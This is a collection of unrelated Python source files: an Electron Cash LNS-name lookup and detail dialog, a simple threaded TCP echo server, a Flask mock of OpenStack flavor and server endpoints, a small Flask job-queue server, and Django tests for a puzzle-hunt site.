but.setToolTip(_('<span style="white-space:nowrap"><b>{lns_name}</b> already in Contacts</span>').format(lns_name=lns_string_em))
else:
add_str = _("Add to Contacts")
but.setToolTip(f'<span style="white-space:nowrap">{add_str}<br> <b>{lns_string_em}</b></span>')
del add_str
def add_contact_slot(ign=None, but=but, item=item):
# label, address, typ='address') -> str:
new_contact = parent.set_contact(label=lns_string, address=info.address, typ='lns')
if new_contact:
msg = _('<span style="white-space:nowrap"><b>{lns_name}</b> added to Contacts</span>').format(lns_name=lns_string_em)
but.setDisabled(True)
but.setToolTip(msg)
all_lns_contacts.add(new_contact.name)
else:
msg = _("Error occurred adding to Contacts")
QToolTip.showText(QCursor.pos(), msg, frame, QRect(), 5000)
# /add_contact
but.clicked.connect(add_contact_slot)
else:
but.setDisabled(True)
but.setToolTip("<i>" + _("Unsupported Account Type") + "</i>")
return but
extra_buttons.append(create_add_to_contacts_button_callback)
if pay_to_button:
def create_payto_but(item):
info, _name = item
lns_string_em = wallet.lns.fmt_info(info)
icon_file = ":icons/paper-plane.svg" if not ColorScheme.dark_scheme else ":icons/paper-plane_dark_theme.svg"
but = QPushButton(QIcon(icon_file), "")
if isinstance(info.address, Address):
payto_str = _("Pay to")
but.setToolTip(f'<span style="white-space:nowrap">{payto_str}<br> <b>{lns_string_em}</b></span>')
but.clicked.connect(lambda: parent.is_alive() and parent.payto_payees([lns_string_em]))
but.clicked.connect(d.reject)
else:
but.setDisabled(True)
but.setToolTip("<i>" + _("Unsupported Account Type") + "</i>")
return but
extra_buttons.append(create_payto_but)
# /Extra Buttons
ca = InfoGroupBox(frame, parent, button_type = button_type, title = '', extra_buttons=extra_buttons)
ca.refresh()
frame.setMinimumWidth(765)
frame.setMinimumHeight(250)
frame.setWidget(ca)
frame.setWidgetResizable(True)
vbox.addWidget(frame)
search.setDefault(True)
if ok_disables:
need_to_fwd_return = True
ok = OkButton(d)
ok.setDisabled(ok_disables)
vbox.addLayout(Buttons(CancelButton(d), ok))
else:
need_to_fwd_return = False
ok = CloseButton(d)
ok.setDefault(False)
vbox.addLayout(Buttons(ok))
def ca_msg(m, clear=False):
ca.no_items_text = m
if clear:
ca.setItems([], auto_resize_parent=False, title = '')
else:
ca.refresh()
tit_lbl.setText('')
def on_return_pressed():
if need_to_fwd_return and search.isEnabled():
search.click()
def on_text_changed(txt):
txt = txt.strip() if txt else ''
search.setEnabled(bool(wallet.lns.parse_string(txt)))
if not txt and not ca.items():
ca_msg(" ")
def on_search():
ok.setDisabled(ok_disables)
name = acct.text().strip()
tup = wallet.lns.parse_string(name)
if tup:
ca_msg(_("Searching for <b>{lns_name}</b> please wait ...").format(lns_name=name), True)
results = None
exc = []
t0 = time.time()
def resolve_verify():
nonlocal results
results = wallet.lns.resolve_verify(name, exc=exc)
results = [(item,item.name) for item in results]
code = VerifyingDialog(parent.top_level_window(),
_("Verifying LNS Name {name} please wait ...").format(name=name),
resolve_verify, auto_show=False).exec_()
if code == QDialog.Rejected:
# user cancel -- the waiting dialog thread will continue to run in the background but that's ok.. it will be a no-op
d.reject()
return
if results:
ca.setItems(results, auto_resize_parent=False, title='', button_type = button_type) # suppress groupbox title
else:
ca_msg(_("The specified LNS Name does not appear to be associated with any BCH address"), True)
if time.time()-t0 >= lns.timeout:
if (wallet.verifier and wallet.synchronizer and # check these are still alive: these could potentially go away from under us if wallet is stopped when we get here.
(not wallet.verifier.is_up_to_date() or not wallet.synchronizer.is_up_to_date())):
parent.show_message(_("No results found. However, your wallet is busy updating."
" This can interfere with LNS lookups."
" You may want to try again when it is done."))
else:
parent.show_message(_("A network timeout occurred while looking up this LNS Name. "
"You may want to check that your internet connection is up and "
"not saturated processing other requests."))
elif exc and isinstance(exc[-1], requests.ConnectionError):
parent.show_error(_("A network connectivity error occured. Please check your internet connection and try again."))
nres = len(results or [])
title = "<b>" + name + "</b> - " + ngettext("{number} LNS Name", "{number} LNS Names", nres).format(number=nres)
tit_lbl.setText(title)
else:
ca_msg(_("Invalid LNS Name, please try again"), True)
acct.textChanged.connect(on_text_changed)
search.clicked.connect(on_search)
acct.returnPressed.connect(on_return_pressed)
ca.buttonGroup().buttonClicked.connect(lambda x=None: ok.setEnabled(ok_disables and ca.selectedItem() is not None))
ca_msg(" ")
if d.exec_() == QDialog.Accepted:
return ca.selectedItems()
parent.contact_list.do_update_signal.emit() # In case they added some contacts, etc
return None
def lns_detail_dialog(parent : MessageBoxMixin, # Should be an ElectrumWindow instance
lns_string : str, # Cash acount string eg: "satoshi.bch"
*, title : str = None # The modal dialog window title
) -> bool: # returns True on success, False on failure
''' Shows the LNS Name details for any LNS Name.
Note that parent should be a ElectrumWindow instance.
`lns_string` is just an LNS Name string of the form:
satoshi.bch
Returns False on failure or True on success. User is presented with an error
message box on False return.'''
from .main_window import ElectrumWindow
assert isinstance(parent, ElectrumWindow)
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
if not wallet.lns.parse_string(lns_string):
parent.show_error(_("Invalid LNS Name:") + f" {lns_string}")
return False
# validate lns_string arg & resolve if need be
info = wallet.lns.get_verified(lns_string)
if not info:
# need to look it up
tup = resolve_lns(parent, lns_string, wallet)
if not tup:
# Error window was provided by resolve_lns, just return
return False
info, lns_string = tup
# . <-- at this point we have a verified LNS name to display
# Make sure it's not an unsupported type as the code at the end of this
# file assumes info.address is an Address.
if not isinstance(info.address, Address):
parent.show_error(_("Unsupported payment data type.") + "\n\n"
+ _("The LNS Name {name} uses an account type that "
"is not supported by Electron Cash.").format(name=lns_string))
return False
title = title or _("LNS Name Details")
# create dialog window
d = WindowModalDialog(parent.top_level_window(), title)
d.setObjectName("WindowModalDialog - " + title)
finalization_print_error(d)
destroyed_print_error(d)
grid = QGridLayout(d)
avatar_lbl = QLabel()
def success_cb(data):
try:
avatar_lbl.setText('')
pix = QPixmap()
pix.loadFromData(data)
avatar_lbl.setPixmap(pix.scaled(75, 75, Qt.KeepAspectRatio, Qt.SmoothTransformation))
except:
pass
def thread_func():
url = f'https://metadata.bch.domains/smartbch/avatar/{lns_string}'
r = requests.get(url, allow_redirects=True)
if r.ok:
success_cb(r.content)
t = threading.Thread(name=f"LNS avatar download",
target=thread_func, daemon=True)
t.start()
avatar_lbl.setToolTip(f'<span style="white-space:nowrap;">{info.name}</span>')
grid.addWidget(avatar_lbl, 0, 0, 3, 1)
fsize = 26
if len(info.name) > 20:
fsize = 15
if len(info.name) > 30:
fsize = 12
if len(info.name) > 50:
fsize = 10
if len(info.name) > 90:
fsize = 8
name_txt = f'<span style="white-space:nowrap; font-size:{fsize}pt; font-weight:bold;">{info.name}'
name_txt += '</span></span>'
def open_link(link):
if Address.is_valid(link):
addr = Address.from_string(link)
if wallet.is_mine(addr):
parent.show_address(addr)
else:
addr_URL = web.BE_URL(parent.config, 'addr', addr)
if addr_URL:
webopen(addr_URL)
return
if link.startswith('http'):
webopen(link)
# name
name_lbl = QLabel(name_txt)
grid.addWidget(name_lbl, 0, 1, 1, 1)
# copy name
copy_name_but = QPushButton()
copy_name_but.setIcon(QIcon(":icons/copy.png"))
button_make_naked(copy_name_but)
copy_name_but.setToolTip('<span style="white-space:nowrap">'
+ _("Copy <b>{lns_name}</b>").format(lns_name=info.name)
+ '</span>')
copy_name_but.clicked.connect(lambda ignored=None, ca_string_em=info.name, copy_but=copy_name_but:
parent.copy_to_clipboard(text=ca_string_em, tooltip=_('Cash Account copied to clipboard'), widget=copy_but) )
grid.addWidget(copy_name_but, 0, 2, 1, 1)
# address label
addr_lbl = QLabel(f'<span style="white-space:nowrap; font-size:15pt;"><a href="{info.address.to_ui_string()}"><pre>{info.address.to_ui_string()}</pre></a></span>')
addr_lbl.linkActivated.connect(open_link)
grid.addWidget(addr_lbl, 1, 1, 1, 1)
# copy address label
copy_addr_but = QPushButton()
copy_addr_but.setIcon(QIcon(":icons/copy.png"))
button_make_naked(copy_addr_but)
copy_addr_but.setToolTip(_("Copy {}").format(_("Address")))
copy_addr_but.clicked.connect(lambda ignored=None, text=info.address.to_ui_string(), copy_but=copy_addr_but:
parent.copy_to_clipboard(text=text, tooltip=_('Address copied to clipboard'), widget=copy_but) )
grid.addWidget(copy_addr_but, 1, 2, 1, 1)
# registration date label
reg_date_lbl = QLabel(f'<span style="white-space:nowrap; font-size:15pt;">Registration date: {util.format_time(info.registrationDate)}</span>')
grid.addWidget(reg_date_lbl, 2, 1, 1, 1)
# expiry date label
exp_date_lbl = QLabel(f'<span style="white-space:nowrap; font-size:15pt;">Expiry date: {util.format_time(info.expiryDate)}</span>')
grid.addWidget(exp_date_lbl, 3, 1, 1, 1)
if not wallet.is_mine(info.address):
ismine_txt = _("External Address") + ', '
else:
ismine_txt = _("My LNS Name") + ', '
# Mined in block
viewname_txt = _("View in LNS app")
url = f'https://app.bch.domains/name/{info.name}'
view_tx_lbl = QLabel(f'<span style="white-space:nowrap; font-size:11pt;">{ismine_txt} <a href="{url}">{viewname_txt}</a></span>')
view_tx_lbl.setToolTip(_("View in LNS app"))
view_tx_lbl.linkActivated.connect(open_link)
grid.addWidget(view_tx_lbl, 4, 1, 1, 1, Qt.AlignTop | Qt.AlignRight)
grid.setRowStretch(4, 1)
# QR
tabs = QTabWidget()
full_addr_str = info.address.to_full_ui_string()
qr_address = QRCodeWidget(full_addr_str, fixedSize=True)
qr_address.setToolTip(full_addr_str)
tabs.addTab(qr_address, _("Address"))
qr_ca_string = QRCodeWidget(lns_string, fixedSize=True)
qr_ca_string.setToolTip(lns_string)
tabs.addTab(qr_ca_string, _("LNS Name"))
qr_address.setMinimumSize(300, 300)
qr_ca_string.setMinimumSize(300, 300)
grid.addWidget(tabs, 5, 0, 1, -1, Qt.AlignTop | Qt.AlignHCenter)
# Bottom buttons
buttons = Buttons(OkButton(d))
grid.addLayout(buttons, 6, 0, -1, -1)
# make all labels allow select text & click links
for c in d.children():
if isinstance(c, QLabel):
c.setTextInteractionFlags(c.textInteractionFlags() | Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse)
try:
d.exec_()
except:
pass
return True
|
tcp_server_test.py | # coding=utf-8
import threading
import time
__author__ = 'xubinggui'
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 9999))
s.listen(5)
print 'Waiting for connection...'
def tcplink(sock, addr):
print 'Accept new connection from %s:%s...' % addr
sock.send('Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if data == 'exit' or not data:
break
sock.send('Hello, %s!' % data)
sock.close()
print 'Connection from %s:%s closed.' % addr
while True:
# 接受一个新连接:
sock, addr = s.accept()
# 创建新线程来处理TCP连接:
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
|
app.py | from flask import Flask, render_template, request, redirect, jsonify, Response
app = Flask(__name__)
import json
import static_response
import uuid
import threading
import time
server_map = ["test"]
lock = threading.Lock()
# def update_thread():
# global stack_map
# while True:
# with lock:
# stack_map['uptime'] = stack_map.get('uptime', 0) + 1
# time.sleep(1.0)
@app.route('/v2.1/<id>/flavors', methods=['POST'])
def flavors(id):
_data = request.json
return Response(json.dumps(static_response.flavor_create(_data)),
status=200,
mimetype='application/json')
@app.route('/v2.1/flavors/detail', methods=['GET'])
def flavors_detail():
return Response(json.dumps(static_response.flavors_detail),
status=200,
mimetype='application/json')
@app.route('/v2.1/<id>/flavors/detail', methods=['GET'])
def flavors_id_detail(id):
return Response(json.dumps(static_response.flavors_detail),
status=200,
mimetype='application/json')
@app.route('/v2.1/<id1>/flavors/<id>/os-extra_specs', methods=['GET'])
def flavors_extra(id1, id):
return Response(json.dumps(static_response.flavor_extra),
status=200,
mimetype='application/json')
@app.route('/v2.1/<id>/servers', methods=['POST'])
def servers(id):
global server_map
_server_id = str(uuid.uuid4())
app.logger.info('Server creation request Name : %s', _server_id)
with lock:
server_map.append(_server_id)
return Response(json.dumps(static_response.servers(_server_id)),
status=202,
mimetype='application/json')
@app.route('/v2.1/<id>/servers/detail', methods=['GET'])
def servers_detail(id):
with lock:
return Response(json.dumps(static_response.servers_details(server_map)),
status=200,
mimetype='application/json')
# @app.route('/v2.1/<id>/servers/<server_id>', methods=['GET'])
# def server_id(id, server_id):
# return Response(json.dumps(static_response.server_id(server_id)),
# status=200,
# mimetype='application/json')
@app.route('/v2.1/<req_type>/<req_id>', methods=['DELETE'])
def delete_data(req_type, req_id):
if req_type == "flavors":
return Response("",
status=202,
mimetype='application/json')
elif req_type == "servers":
return Response("",
status=204,
mimetype='application/json')
if __name__ == '__main__':
# threading.Thread(target=update_thread).start()
app.run(debug=True, host='0.0.0.0', port=9775)
|
server.py | from multiprocessing import Process
import logging
import urllib
from flask import abort, Flask, g, request
""" A minimal server that will implement the REST API that we use to communicate
with the daemon. """
logger = logging.getLogger(__name__)
# Flask app.
_app = Flask(__name__)
# Queue we use to send data to the daemon
_queue = None
@_app.route("/add_job", methods=["POST"])
def _add_job():
""" Adds a new job to the daemon. """
logger.debug("Got HTTP request: %s" % (request.url))
job_dir = request.form.get("job_dir", None)
if not job_dir:
logger.error("Invalid request with no job_dir parameter.")
abort(400)
job_dir = urllib.parse.unquote_plus(job_dir)
# Actually add the job.
_queue.put({"type": "add_job", "job_dir": job_dir})
# No content to show.
return ("", 204)
def _run_server(queue):
""" Runs the flask server. Meant to be called in a different process.
Args:
queue: The queue to send requests for the main daemon on. """
global _queue
_queue = queue
_app.run()
def start(queue):
""" Starts the server running.
Args:
queue: The queue to send requests for the main daemon on. """
logger.info("Starting new server...")
server = Process(target=_run_server, args=(queue,))
server.start()
|
tests.py | from django.test import TestCase, override_settings
from django.urls import reverse
from huntserver import models, forms, templatetags
from django.contrib.auth.models import User
from django.utils import timezone
from django.core.exceptions import ValidationError
from datetime import timedelta
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
from http.server import SimpleHTTPRequestHandler
try:
from SocketServer import TCPServer as HTTPServer
except ImportError:
from http.server import HTTPServer
from threading import Thread
# python manage.py dumpdata --indent=4 --exclude=contenttypes --exclude=sessions --exclude=admin
# --exclude=auth.permission
# Users: admin, user1, user2, user3, user4, user5, user6
# admin is superuser/staff and on no teams
# user1 is on teams 2, 6, 8 (1-2, 2-3, 3-2)
# user2 is on teams 2, 6, 9 (1-2, 2-3, 3-3) # Reserved for ratelimiting
# user3 is on teams 3, 5 (1-3, 2-2 )
# user4 is on teams 3, 4 (1-3, 2-1 )
# user5 is on teams 6 ( 2-3 )
# user6 is not on any teams
# 3 Hunts: hunt 1 is in the past, hunt 2 is current and running, hunt 3 is in the future
# Hunt 1: Team limit of 5
# Hunt 2: Team limit of 3
# Hunt 3: Team limit of 3
# 3 puzzles per hunt
# 3 teams per hunt, in each hunt, second team is a playtesting team
def login(test, username):
test.assertTrue(test.client.login(username=username, password='password'))
def get_and_check_page(test, page, code, args={}):
response = test.client.get(reverse(page, kwargs=args))
test.assertEqual(response.status_code, code)
return response
def ajax_and_check_page(test, page, code, args={}):
response = test.client.get(reverse(page), args,
**{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'})
test.assertEqual(response.status_code, code)
return response
def message_from_response(response):
messages = list(response.context['messages'])
if(len(messages) > 0):
return str(messages[0])
else:
return ""
def solve_puzzle_from_admin(test):
test.client.logout()
login(test, 'user5')
post_context = {'answer': "wrong answer"}
response = test.client.post(reverse('huntserver:puzzle', kwargs={"puzzle_id": "201"}),
post_context)
test.assertEqual(response.status_code, 200)
post_context = {'answer': "ANSWER21"}
response = test.client.post(reverse('huntserver:puzzle', kwargs={"puzzle_id": "201"}),
post_context)
test.assertEqual(response.status_code, 200)
post_context = {'answer': "wrong answer"}
response = test.client.post(reverse('huntserver:puzzle', kwargs={"puzzle_id": "202"}),
post_context)
test.assertEqual(response.status_code, 200)
response = test.client.post(reverse('huntserver:puzzle', kwargs={"puzzle_id": "201"}),
post_context)
test.assertEqual(response.status_code, 200)
test.client.logout()
login(test, 'admin')
class nonWebTests(TestCase):
fixtures = ["basic_hunt"]
def setUp(self):
puzzle = models.Puzzle.objects.get(pk=5)
team = models.Team.objects.get(pk=2)
models.Submission.objects.create(team=team, submission_time=timezone.now(), puzzle=puzzle,
submission_text="foobar", modified_date=timezone.now())
models.Solve.objects.create(puzzle=puzzle, team=team,
submission=models.Submission.objects.all()[0])
models.Unlock.objects.create(puzzle=puzzle, team=team, time=timezone.now())
models.Message.objects.create(team=team, is_response=False, text="foobar",
time=timezone.now())
models.Unlockable.objects.create(puzzle=puzzle, content_type="TXT", content="foobar")
def test_unicode(self):
str(models.Hunt.objects.all()[0])
str(models.Puzzle.objects.all()[0])
str(models.Person.objects.all()[0])
# str(models.Person.objects.all()[-1])
str(models.Submission.objects.all()[0])
str(models.Solve.objects.all()[0])
str(models.Unlock.objects.all()[0])
str(models.Message.objects.all()[0])
str(models.Unlockable.objects.all()[0])
str(models.Response.objects.all()[0])
# str(models.HuntAssetFile.objects.all()[0])
def test_hunt_cleaning(self):
with self.assertRaises(ValidationError):
hunt = models.Hunt.objects.get(is_current_hunt=True)
hunt.is_current_hunt = False
hunt.save()
def test_bootstrap_tag(self):
templatetags.bootstrap_tags.active_page(None, None)
# Try to cover Resolver404 case
class InfoTests(TestCase):
fixtures = ["basic_hunt"]
def test_index(self):
"Test the index page"
response = get_and_check_page(self, 'huntserver:index', 200)
self.assertTrue(isinstance(response.context['curr_hunt'], models.Hunt))
def test_previous_hunts(self):
"Test the previous hunts page"
response = get_and_check_page(self, 'huntserver:previous_hunts', 200)
self.assertTrue('hunts' in response.context)
for hunt in response.context['hunts']:
self.assertTrue(isinstance(hunt, models.Hunt))
def test_registration1(self):
"Test the registration page when not logged in"
response = get_and_check_page(self, 'huntserver:registration', 200)
self.assertEqual(message_from_response(response), "")
def test_registration2(self):
"Test the registration page when logged in and on a team"
login(self, 'user1')
response = get_and_check_page(self, 'huntserver:registration', 200)
self.assertTrue('registered_team' in response.context)
self.assertTrue(isinstance(response.context['registered_team'], models.Team))
def test_registration3(self):
"Test the registration page when logged in and not on a team"
login(self, 'user6')
response = get_and_check_page(self, 'huntserver:registration', 200)
self.assertEqual(message_from_response(response), "")
self.assertTrue('teams' in response.context)
for hunt in response.context['teams']:
self.assertTrue(isinstance(hunt, models.Team))
def test_registration_post_new(self):
"Test the registration page's join team functionality"
login(self, 'user6')
post_context = {"form_type": "new_team", "team_name": "new_team",
"need_room": "need_a_room"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['user'].person.teams.all()), 1)
team = response.context['user'].person.teams.all()[0]
self.assertEqual(response.context['registered_team'], team)
self.assertEqual(team.team_name, post_context['team_name'])
self.assertEqual(team.location, post_context['need_room'])
self.assertEqual(team.hunt, models.Hunt.objects.get(is_current_hunt=True))
self.assertEqual(team.playtester, False)
self.assertTrue(len(team.join_code) >= 5)
def test_registration_post_join(self):
"Test the registration page's new team functionality"
login(self, 'user6')
post_context = {"form_type": "join_team", "team_name": "Team2-2",
"join_code": "JOIN5"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['user'].person.teams.all()), 1)
team = response.context['user'].person.teams.all()[0]
self.assertEqual(response.context['registered_team'], team)
self.assertEqual(team.team_name, post_context['team_name'])
self.assertEqual(team.hunt, models.Hunt.objects.get(is_current_hunt=True))
self.assertEqual(len(team.person_set.all()), 2)
def test_registration_post_leave(self):
"Test the registration page's leave team functionality"
login(self, 'user5')
post_context = {"form_type": "leave_team"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertEqual(response.status_code, 200)
self.assertNotEqual(message_from_response(response), "")
hunt = models.Hunt.objects.get(is_current_hunt=True)
self.assertEqual(len(response.context['user'].person.teams.filter(hunt=hunt)), 0)
self.assertEqual(len(models.Team.objects.get(team_name="Team2-3").person_set.all()), 2)
login(self, 'user4')
hunt.start_date = hunt.start_date + timedelta(days=10000)
hunt.end_date = hunt.end_date + timedelta(days=10000)
hunt.save()
post_context = {"form_type": "leave_team"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertEqual(response.status_code, 200)
self.assertNotEqual(message_from_response(response), "")
self.assertEqual(len(response.context['user'].person.teams.filter(hunt=hunt)), 0)
def test_registration_post_change_location(self):
"Test the registration page's new location functionality"
login(self, 'user4')
post_context = {"form_type": "new_location", "team_location": "location2.0"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertEqual(response.status_code, 200)
hunt = models.Hunt.objects.get(is_current_hunt=True)
team = response.context['user'].person.teams.filter(hunt=hunt)[0]
self.assertEqual(response.context['registered_team'], team)
self.assertEqual(team.location, post_context['team_location'])
def test_registration_post_change_name(self):
"Test the registration page's new team name functionality"
login(self, 'user4')
post_context = {"form_type": "new_name", "team_name": "name 2.0"}
hunt = models.Hunt.objects.get(is_current_hunt=True)
hunt.start_date = hunt.start_date + timedelta(days=10000)
hunt.end_date = hunt.end_date + timedelta(days=10000)
hunt.save()
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertEqual(response.status_code, 200)
team = response.context['user'].person.teams.filter(hunt=hunt)[0]
self.assertEqual(response.context['registered_team'], team)
self.assertEqual(team.team_name, post_context['team_name'])
def test_registration_post_invalid_data(self):
"Test the registration page with invalid post data"
login(self, 'user6')
post_context = {"form_type": "new_team", "team_name": "team2-2",
"need_room": "need_a_room"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertNotEqual(message_from_response(response), "")
self.assertEqual(response.status_code, 200)
post_context = {"form_type": "new_team", "team_name": " ",
"need_room": "need_a_room"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertNotEqual(message_from_response(response), "")
self.assertEqual(response.status_code, 200)
post_context = {"form_type": "join_team", "team_name": "Team2-3",
"join_code": "JOIN5"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertNotEqual(message_from_response(response), "")
self.assertEqual(response.status_code, 200)
post_context = {"form_type": "join_team", "team_name": "Team2-2",
"join_code": "JOIN0"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertNotEqual(message_from_response(response), "")
self.assertEqual(response.status_code, 200)
post_context = {"form_type": "join_team", "team_name": "Team2-3",
"join_code": "JOIN6"}
response = self.client.post(reverse('huntserver:registration'), post_context)
self.assertNotEqual(message_from_response(response), "")
self.assertEqual(response.status_code, 200)
def test_user_profile(self):
"Test the user profile page"
login(self, 'user4')
response = get_and_check_page(self, 'huntserver:user_profile', 200)
self.assertTrue(isinstance(response.context['user_form'], forms.ShibUserForm))
self.assertTrue(isinstance(response.context['person_form'], forms.PersonForm))
def test_user_profile_post_update(self):
"Test the ability to update information on the user profile page"
login(self, 'user4')
user = User.objects.get(username="user4")
post_context = {'first_name': user.first_name, 'last_name': user.last_name,
'username': user.username, 'email': 'test@test.com',
'phone': user.person.phone, 'allergies': user.person.allergies}
response = self.client.post(reverse('huntserver:user_profile'), post_context)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].email, "test@test.com")
def test_user_profile_post_invalid_data(self):
"Test the profile page with incorrect data"
login(self, 'user4')
user = User.objects.get(username="user4")
post_context = {'first_name': user.first_name, 'last_name': user.last_name,
'username': user.username, 'email': 'user3@example.com',
'phone': user.person.phone, 'allergies': user.person.allergies}
response = self.client.post(reverse('huntserver:user_profile'), post_context)
self.assertEqual(response.status_code, 200)
def test_contact_us(self):
"Test the contact us page"
get_and_check_page(self, 'huntserver:contact_us', 200)
@override_settings(RATELIMIT_ENABLE=False)
class HuntTests(TestCase):
fixtures = ["basic_hunt"]
def test_protected_static(self):
"Test the static file protected view"
login(self, 'user1')
get_and_check_page(self, 'huntserver:protected_static', 200,
{"file_path": "/"})
get_and_check_page(self, 'huntserver:protected_static', 200,
{"file_path": "puzzles/101/example.pdf"})
get_and_check_page(self, 'huntserver:protected_static', 404,
{"file_path": "puzzles/201/example.pdf"})
def test_hunt_normal(self):
"Test the basic per-hunt view"
# Check when logged out
get_and_check_page(self, 'huntserver:hunt', 302, {"hunt_num": "2"})
login(self, 'user4')
get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "1"})
get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "2"})
get_and_check_page(self, 'huntserver:hunt', 302, {"hunt_num": "3"})
login(self, 'admin')
get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "2"})
login(self, 'user3')
get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "2"})
login(self, 'user6')
get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "2"})
def test_current_hunt(self):
"Test the current hunt redirect"
login(self, 'user1')
get_and_check_page(self, 'huntserver:current_hunt', 200)
def test_puzzle_normal(self):
"Test the basic per-puzzle view"
# Check when logged out
response = get_and_check_page(self, 'huntserver:puzzle', 302, {"puzzle_id": "201"})
login(self, 'user4')
response = get_and_check_page(self, 'huntserver:puzzle', 200, {"puzzle_id": "101"})
post_context = {'answer': "Wrong Answer"}
response = self.client.post(reverse('huntserver:puzzle',
kwargs={"puzzle_id": "101"}),
post_context)
self.assertEqual(response.status_code, 200)
response = self.client.post(reverse('huntserver:puzzle',
kwargs={"puzzle_id": "101"}))
self.assertEqual(response.status_code, 200)
response = get_and_check_page(self, 'huntserver:puzzle', 200, {"puzzle_id": "201"})
post_context = {'answer': "Wrong Answer"}
response = self.client.post(reverse('huntserver:puzzle',
kwargs={"puzzle_id": "201"}),
post_context)
self.assertEqual(response.status_code, 200)
post_context = {'answer': "ANSWER21"}
response = self.client.post(reverse('huntserver:puzzle',
kwargs={"puzzle_id": "201"}),
post_context)
self.assertEqual(response.status_code, 200)
post_context = {'answer': "almost"}
response = self.client.post(reverse('huntserver:puzzle',
kwargs={"puzzle_id": "202"}),
post_context)
self.assertEqual(response.status_code, 200)
post_context = {'answer': "answer22"}
response = self.client.post(reverse('huntserver:puzzle',
kwargs={"puzzle_id": "202"}),
post_context)
self.assertEqual(response.status_code, 200)
response = self.client.get(reverse('huntserver:puzzle', kwargs={"puzzle_id": "201"}),
{'last_date': '2000-01-01T01:01:01.001Z'},
**{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'})
self.assertEqual(response.status_code, 200)
@override_settings(RATELIMIT_ENABLE=True)
def test_puzzle_ratelimit(self):
"Test that users are properly ratelimited"
login(self, 'user2')
post_context = {'answer': "Wrong Answer"}
for i in range(20):
response = self.client.post(reverse('huntserver:puzzle', kwargs={"puzzle_id": "101"}),
post_context)
response = self.client.post(reverse('huntserver:puzzle', kwargs={"puzzle_id": "101"}),
post_context)
self.assertEqual(response.status_code, 403)
def test_chat_normal(self):
"Test the basic chat view"
login(self, 'user6')
response = get_and_check_page(self, 'huntserver:chat', 200)
self.assertTemplateUsed(response, 'access_error.html')
login(self, 'user1')
response = get_and_check_page(self, 'huntserver:chat', 200)
post_context = {'team_pk': "2", 'is_announcement': "false",
'is_response': "false", 'message': "my simple message"}
response = self.client.post(reverse('huntserver:chat'), post_context)
response = self.client.post(reverse('huntserver:chat'), post_context)
self.assertEqual(response.status_code, 200)
post_context = {'team_pk': "", 'is_announcement': "true",
'is_response': "false", 'message': "my simple message"}
response = self.client.post(reverse('huntserver:chat'), post_context)
self.assertEqual(response.status_code, 200)
response = ajax_and_check_page(self, 'huntserver:chat', 200, {'last_pk': '0'})
response = get_and_check_page(self, 'huntserver:chat', 200)
def test_unlockables(self):
"Test the unlockables view"
login(self, 'user1')
response = get_and_check_page(self, 'huntserver:unlockables', 200)
login(self, 'user6')
response = get_and_check_page(self, 'huntserver:unlockables', 200)
self.assertTemplateUsed(response, 'access_error.html')
@override_settings(USE_SHIBBOLETH=False)
class AuthTests(TestCase):
fixtures = ["basic_hunt"]
def test_create_account(self):
"Test the account creation view"
response = get_and_check_page(self, 'huntserver:create_account', 200)
post_context = {'user-first_name': "first", 'user-last_name': "last",
'user-username': "user7",
'user-email': 'user7@example.com', 'person-phone': "777-777-7777",
'person-allergies': "something", 'user-password': "password",
'user-confirm_password': "password"}
post_context['user-email'] = "user6@example.com"
response = self.client.post(reverse('huntserver:create_account'), post_context)
self.assertEqual(response.status_code, 200)
post_context['user-email'] = "user7@example.com"
post_context['user-username'] = "$$$"
response = self.client.post(reverse('huntserver:create_account'), post_context)
self.assertEqual(response.status_code, 200)
post_context['user-username'] = "user7"
post_context['user-confirm_password'] = "wordpass"
response = self.client.post(reverse('huntserver:create_account'), post_context)
self.assertEqual(response.status_code, 200)
post_context['user-confirm_password'] = "password"
response = self.client.post(reverse('huntserver:create_account'), post_context)
self.assertEqual(response.status_code, 200)
def test_login_selection(self):
"Test the login selection view"
response = get_and_check_page(self, 'huntserver:login_selection', 200)
response = self.client.get(reverse('huntserver:login_selection'), {'next': '/'})
self.assertEqual(response.status_code, 200)
def test_account_logout(self):
"Test the account logout view"
login(self, 'user1')
response = get_and_check_page(self, 'huntserver:account_logout', 200)
login(self, 'user1')
response = self.client.get(reverse('huntserver:account_logout'), {'next': '/'})
self.assertEqual(response.status_code, 200)
def test_shib_login(self):
"Test the shib login view"
# No HTTP_META data, should fail
response = self.client.get(reverse('huntserver:new_shib_account'))
self.assertTemplateUsed(response, 'attribute_error.html')
# Username is empty, should fail
META = {"Shib-Identity-Provider": 'https://login.cmu.edu/idp/shibboleth',
"eppn": "", "givenName": "Test",
"sn": "User"}
response = self.client.get(reverse('huntserver:new_shib_account'), **META)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'attribute_error.html')
# Bad shib setup, should fail
META = {"Shib-Identity-Provider": 'https://login.cmu.edu/idp/shibboleth',
"givenName": "Test", "sn": "User"}
response = self.client.get(reverse('huntserver:new_shib_account'), **META)
self.assertTemplateUsed(response, 'attribute_error.html')
self.assertEqual(response.status_code, 200)
# Missing name, should be fine
